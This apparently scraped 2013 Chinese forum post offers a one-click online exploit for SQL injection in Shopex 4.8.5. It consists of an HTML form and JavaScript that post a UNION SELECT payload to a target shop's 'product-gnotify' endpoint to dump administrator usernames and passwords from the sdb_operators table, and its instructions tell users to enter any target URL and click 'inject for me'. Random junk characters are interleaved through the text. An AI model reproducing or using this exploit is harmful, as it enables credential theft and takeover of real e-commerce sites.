<center>
% _; v- o# U% B) K' _' I/ M( R<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>
2 z e" |% j3 Z0 ]+ o7 C- C<form action="" method="post" name="submit_url">
`; F f9 K5 n网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>: ~) F, h: q- ~
<input type="hidden" name="goods[goods_id]" value="3">
+ c8 H: f/ m0 g0 R<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">7 k8 e: h+ t- R" |) L8 _
<input type="submit" value="给我注入" onclick=fsubmit()>+ U" e( e# w9 F* A, B
</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com
- n& O, b+ F7 W9 m7 d: l$ M5 M- L' j+ ^) S, R5 A- I. u
<script>
# V7 H2 q" T/ S) m# gfunction fsubmit(){ - D8 L5 B; z5 e$ }
form = document.forms[0];
. T' |6 u3 R% `form.action = form.url.value+'/?product-gnotify'; 4 J9 A+ j5 {2 F; {# Z
form.submit(); % D% `4 f+ J% g% B
}
$ H4 ?6 ?3 \5 A/ p" l3 T( E</script>
4 P. `- n+ j8 T ]) C( x |
发表于 2013-1-23 09:20:52
收藏
支持
反对